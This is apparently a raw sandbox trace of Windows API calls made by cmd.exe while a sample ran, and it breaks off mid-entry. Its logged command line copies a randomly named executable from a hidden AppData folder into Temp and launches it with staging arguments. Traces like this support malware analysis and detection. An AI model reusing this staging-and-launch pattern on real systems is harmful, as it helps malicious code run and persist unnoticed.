GetCurrentThreadId () returned 0xd98 [0114.929] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd98) returned 0x38 [0114.929] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0114.929] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0114.929] SetThreadUILanguage (LangId=0x0) returned 0x409 [0114.929] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0114.929] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2af7d4 | out: phkResult=0x2af7d4*=0x0) returned 0x2 [0114.929] VirtualQuery (in: lpAddress=0x2af80b, lpBuffer=0x2af7a4, dwLength=0x1c | out: lpBuffer=0x2af7a4*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0114.929] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2af7a4, dwLength=0x1c | out: lpBuffer=0x2af7a4*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0114.929] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2af7a4, dwLength=0x1c | out: lpBuffer=0x2af7a4*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0114.929] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2af7a4, dwLength=0x1c | out: lpBuffer=0x2af7a4*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0114.929] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2af7a4, dwLength=0x1c | out: lpBuffer=0x2af7a4*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0114.929] GetConsoleOutputCP () returned 0x1b5 [0114.929] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0114.929] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0114.929] _get_osfhandle (_FileHandle=1) returned 0x7 [0114.929] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0114.929] _get_osfhandle (_FileHandle=1) returned 0x7 [0114.930] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0114.930] _get_osfhandle (_FileHandle=1) returned 0x7 [0114.930] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0114.930] _get_osfhandle (_FileHandle=0) returned 0x3 [0114.930] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0114.930] _get_osfhandle (_FileHandle=0) returned 0x3 [0114.930] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0114.930] GetEnvironmentStringsW () returned 0x90388* [0114.930] FreeEnvironmentStringsW (penv=0x90388) returned 1 [0114.930] GetEnvironmentStringsW () returned 0x90388* [0114.930] FreeEnvironmentStringsW (penv=0x90388) returned 1 [0114.930] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae744 | out: phkResult=0x2ae744*=0x40) returned 0x0 [0114.931] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae74c, lpData=0x2ae750, lpcbData=0x2ae748*=0x1000 | out: lpType=0x2ae74c*=0x0, lpData=0x2ae750*=0x38, lpcbData=0x2ae748*=0x1000) returned 0x2 [0114.931] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae74c, lpData=0x2ae750, lpcbData=0x2ae748*=0x1000 | out: lpType=0x2ae74c*=0x4, lpData=0x2ae750*=0x1, lpcbData=0x2ae748*=0x4) returned 0x0 [0114.931] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae74c, lpData=0x2ae750, lpcbData=0x2ae748*=0x1000 | out: lpType=0x2ae74c*=0x0, lpData=0x2ae750*=0x1, lpcbData=0x2ae748*=0x1000) returned 0x2 [0114.931] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae74c, lpData=0x2ae750, lpcbData=0x2ae748*=0x1000 | out: lpType=0x2ae74c*=0x4, lpData=0x2ae750*=0x0, lpcbData=0x2ae748*=0x4) returned 0x0 [0114.931] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae74c, lpData=0x2ae750, lpcbData=0x2ae748*=0x1000 | out: lpType=0x2ae74c*=0x4, lpData=0x2ae750*=0x40, lpcbData=0x2ae748*=0x4) returned 0x0 [0114.931] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae74c, lpData=0x2ae750, lpcbData=0x2ae748*=0x1000 | out: lpType=0x2ae74c*=0x4, lpData=0x2ae750*=0x40, lpcbData=0x2ae748*=0x4) returned 0x0 [0114.931] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae74c, lpData=0x2ae750, lpcbData=0x2ae748*=0x1000 | out: lpType=0x2ae74c*=0x0, lpData=0x2ae750*=0x40, lpcbData=0x2ae748*=0x1000) returned 0x2 [0114.931] RegCloseKey (hKey=0x40) returned 0x0 [0114.931] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae744 | out: phkResult=0x2ae744*=0x40) returned 0x0 [0114.931] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae74c, lpData=0x2ae750, lpcbData=0x2ae748*=0x1000 | out: lpType=0x2ae74c*=0x0, lpData=0x2ae750*=0x40, lpcbData=0x2ae748*=0x1000) returned 0x2 [0114.931] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae74c, lpData=0x2ae750, lpcbData=0x2ae748*=0x1000 | out: lpType=0x2ae74c*=0x4, lpData=0x2ae750*=0x1, lpcbData=0x2ae748*=0x4) returned 0x0 [0114.931] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae74c, lpData=0x2ae750, lpcbData=0x2ae748*=0x1000 | out: lpType=0x2ae74c*=0x0, lpData=0x2ae750*=0x1, lpcbData=0x2ae748*=0x1000) returned 0x2 [0114.931] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae74c, lpData=0x2ae750, lpcbData=0x2ae748*=0x1000 | out: lpType=0x2ae74c*=0x4, lpData=0x2ae750*=0x0, lpcbData=0x2ae748*=0x4) returned 0x0 [0114.931] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae74c, lpData=0x2ae750, lpcbData=0x2ae748*=0x1000 | out: lpType=0x2ae74c*=0x4, lpData=0x2ae750*=0x9, lpcbData=0x2ae748*=0x4) returned 0x0 [0114.931] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae74c, lpData=0x2ae750, lpcbData=0x2ae748*=0x1000 | out: lpType=0x2ae74c*=0x4, lpData=0x2ae750*=0x9, lpcbData=0x2ae748*=0x4) returned 0x0 [0114.931] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae74c, lpData=0x2ae750, lpcbData=0x2ae748*=0x1000 | out: lpType=0x2ae74c*=0x0, lpData=0x2ae750*=0x9, lpcbData=0x2ae748*=0x1000) returned 0x2 [0114.931] RegCloseKey (hKey=0x40) returned 0x0 [0114.931] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88635b [0114.931] srand (_Seed=0x5b88635b) [0114.931] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" [0114.931] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" [0114.931] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0114.932] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x91ae8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0114.932] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0114.932] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0114.932] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0114.932] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0114.932] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0114.932] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0114.932] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0114.932] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0114.932] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0114.932] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0114.932] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0114.932] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0114.932] GetEnvironmentStringsW () returned 0x924d8* [0114.932] FreeEnvironmentStringsW (penv=0x924d8) returned 1 [0114.932] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0114.932] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0114.932] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0114.932] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0114.932] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0114.932] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0114.932] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0114.932] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0114.932] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0114.932] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0114.932] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af510 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0114.933] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af510, lpFilePart=0x2af50c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af50c*="Desktop") returned 0x18 [0114.933] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0114.933] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af28c | out: lpFindFileData=0x2af28c) returned 0x90b68 [0114.933] FindClose (in: hFindFile=0x90b68 | out: hFindFile=0x90b68) returned 1 [0114.933] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af28c | out: lpFindFileData=0x2af28c) returned 0x90b68 [0114.933] FindClose (in: hFindFile=0x90b68 | out: hFindFile=0x90b68) returned 1 [0114.933] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af28c | out: lpFindFileData=0x2af28c) returned 0x90b68 [0114.933] FindClose (in: hFindFile=0x90b68 | out: hFindFile=0x90b68) returned 1 [0114.933] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0114.933] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0114.933] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0114.933] GetEnvironmentStringsW () returned 0x90388* [0114.934] FreeEnvironmentStringsW (penv=0x90388) returned 1 [0114.934] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0114.934] GetConsoleOutputCP () returned 0x1b5 [0114.934] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0114.934] GetUserDefaultLCID () returned 0x409 [0114.934] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0114.935] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2af650, cchData=128 | out: lpLCData="0") returned 2 [0114.935] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2af650, cchData=128 | out: lpLCData="0") returned 2 [0114.935] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2af650, cchData=128 | out: lpLCData="1") returned 2 [0114.935] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0114.935] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0114.935] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0114.935] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0114.935] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0114.935] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0114.935] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0114.935] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0114.935] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0114.935] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0114.935] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0114.936] GetConsoleTitleW (in: lpConsoleTitle=0x80a10, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0114.936] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0114.936] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0114.936] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0114.936] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0114.937] _wcsicmp (_String1="type", _String2=")") returned 75 [0114.937] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0114.937] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0114.937] _wcsicmp (_String1="IF", _String2="type") returned -11 [0114.937] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0114.937] _wcsicmp (_String1="REM", _String2="type") returned -2 [0114.937] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0114.940] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\"") returned 68 [0114.940] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\"") returned 68 [0114.941] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\"") returned 71 [0114.941] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\"") returned 71 [0114.941] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\"") returned 80 [0114.941] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\"") returned 80 [0114.944] _get_osfhandle (_FileHandle=1) returned 0x7 [0114.944] _get_osfhandle (_FileHandle=1) returned 0x7 [0114.944] _get_osfhandle (_FileHandle=1) returned 0x7 [0114.944] GetFileType (hFile=0x7) returned 0x2 [0114.944] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0114.944] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2af4e4 | out: lpMode=0x2af4e4) returned 1 [0114.944] _dup (_FileHandle=1) returned 3 [0114.944] _close (_FileHandle=1) returned 0 [0114.944] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe", _String2="con") returned -53 [0114.944] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2af4b4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0114.945] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0114.945] GetConsoleTitleW (in: lpConsoleTitle=0x2af2e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0114.945] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0114.945] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0114.945] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0114.945] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0114.946] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0114.946] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x2aee48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee48) returned 0x80f68 [0114.946] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0114.946] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0114.946] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0114.946] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2add54, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0114.946] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0114.947] _get_osfhandle (_FileHandle=4) returned 0x54 [0114.947] GetFileType (hFile=0x54) returned 0x1 [0114.947] _get_osfhandle (_FileHandle=4) returned 0x54 [0114.947] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2addac | out: lpFileSizeHigh=0x2addac*=0x0) returned 0x7d600 [0114.947] _get_osfhandle (_FileHandle=4) returned 0x54 [0114.947] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.947] _get_osfhandle (_FileHandle=4) returned 0x54 [0114.947] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0114.948] _get_osfhandle (_FileHandle=1) returned 0x4c [0114.948] GetFileType (hFile=0x4c) returned 0x1 [0114.948] _get_osfhandle (_FileHandle=1) returned 0x4c [0114.948] GetFileType (hFile=0x4c) returned 0x1 [0114.948] _get_osfhandle (_FileHandle=1) returned 0x4c [0114.948] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0114.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0114.949] GetFileType (hFile=0x4c) returned 0x1 [0114.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0114.949] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0114.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0114.949] GetFileType (hFile=0x4c) returned 0x1 [0114.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0114.949] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0114.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0114.949] GetFileType (hFile=0x4c) returned 0x1 [0114.949] _get_osfhandle (_FileHandle=1) returned 0x4c [0114.949] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0114.950] _get_osfhandle (_FileHandle=1) returned 0x4c [0114.950] GetFileType (hFile=0x4c) returned 0x1 [0114.950] _get_osfhandle (_FileHandle=1) returned 0x4c [0114.950] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0114.950] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.061] GetFileType (hFile=0x4c) returned 0x1 [0115.061] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.061] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.061] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.061] GetFileType (hFile=0x4c) returned 0x1 [0115.061] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.061] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.061] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.061] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.061] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.061] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.062] GetFileType (hFile=0x4c) returned 0x1 [0115.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.062] GetFileType (hFile=0x4c) returned 0x1 [0115.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.062] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.062] GetFileType (hFile=0x4c) returned 0x1 [0115.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.062] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.062] GetFileType (hFile=0x4c) returned 0x1 [0115.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.062] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.062] GetFileType (hFile=0x4c) returned 0x1 [0115.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.062] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.062] GetFileType (hFile=0x4c) returned 0x1 [0115.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.063] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.063] GetFileType (hFile=0x4c) returned 0x1 [0115.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.063] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: 